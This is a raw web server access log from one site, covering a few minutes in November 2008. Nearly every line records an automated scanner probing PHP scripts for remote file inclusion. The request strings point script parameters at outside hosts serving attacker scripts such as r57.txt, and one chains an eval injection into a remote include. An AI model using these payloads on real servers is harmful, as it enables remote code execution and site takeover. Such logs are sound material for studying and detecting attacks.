80.238.225.165 - - [29/Nov/2008:08:32:34 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:48 -0800] "GET /logs/access_080919.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:48 -0800] "GET /logs/access_080919.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:58 -0800] "GET /logs/access_080919.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:33:01 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:33:01 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:33:01 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.239.112.207 - - [29/Nov/2008:08:33:02 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:33:05 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:33:05 -0800] "GET /logs/access_080307.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:33:05 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:33:06 -0800] "GET /logs/access_080524.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.239.112.207 - - [29/Nov/2008:08:33:07 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.64.3.50 - - [29/Nov/2008:08:33:24 -0800] "GET /logs/access_080525.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.evilc0der.com/r57.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
217.64.3.50 - - [29/Nov/2008:08:33:25 -0800] "GET /logs/access_080530.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.evilc0der.com/r57.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:33:28 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:33:28 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:33:28 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:33:29 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.192.80 - - [29/Nov/2008:08:33:51 -0800] "GET /logs/access.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [29/Nov/2008:08:33:51 -0800] "GET /logs/access_080714.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:34:05 -0800] "GET /logs/access_080919.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:34:12 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:35:07 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:36:54 -0800] "GET /logs/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:36:54 -0800] "GET /Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:36:54 -0800] "GET /logs/access_080507.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:38:03 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:38:04 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:38:05 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:08:38:12 -0800] "GET /logs/access_080828.log/page.php?doc=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:08:38:12 -0800] "GET /page.php?doc=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:08:38:12 -0800] "GET /logs/page.php?doc=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:38:15 -0800] "GET /logs/access_080509.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:38:16 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:38:16 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:08:38:25 -0800] "GET /logs/access_080615.log/page.php?doc=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:38:45 -0800] "GET /Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:38:50 -0800] "GET /logs/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:38:50 -0800] "GET /logs/access_081107.log%20%20/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.219.38.246 - - [29/Nov/2008:08:38:59 -0800] "GET /logs/access_080828.log/page.php?doc=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:39:00 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:39:01 -0800] "GET /logs/access_080611.log%20%20/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:39:03 -0800] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.219.38.246 - - [29/Nov/2008:08:39:05 -0800] "GET /page.php?doc=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.219.38.246 - - [29/Nov/2008:08:39:05 -0800] "GET /logs/page.php?doc=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:40:03 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:40:03 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:03 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:40:03 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:03 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:03 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:03 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:40:03 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:05 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:05 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:13 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:13 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:13 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:14 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:40:14 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:19 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:19 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:19 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:40:25 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:40:25 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:40:25 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:40:25 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:25 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:40:26 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:40:53 -0800] "GET /logs/access_080804.log//pjsfiles/modify.php?installed_config_file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:40:56 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:40:56 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:40:57 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:40:57 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:40:58 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:41:02 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.219.38.246 - - [29/Nov/2008:08:41:04 -0800] "GET /logs/access_080615.log/page.php?doc=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:41:24 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [29/Nov/2008:08:41:38 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:40 -0800] "GET /logs/access_080529.log//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:45 -0800] "GET /index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 94833 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:46 -0800] "GET /logs/access_080529.log//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:47 -0800] "GET /index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 94849 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:47 -0800] "GET /logs//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:41:49 -0800] "GET /logs//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:42:05 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [29/Nov/2008:08:42:12 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:42:40 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:42:40 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:42:40 -0800] "GET /logs/access_080705.log//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:42:41 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:42:41 -0800] "GET /logs//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:42:42 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:42:42 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [29/Nov/2008:08:42:42 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [29/Nov/2008:08:42:42 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [29/Nov/2008:08:42:43 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:43:16 -0800] "GET /logs/access_080914.log//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:43:23 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.32.11 - - [29/Nov/2008:08:43:23 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://demo.pac-werbeagentur.de/lhf/website/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:43:30 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
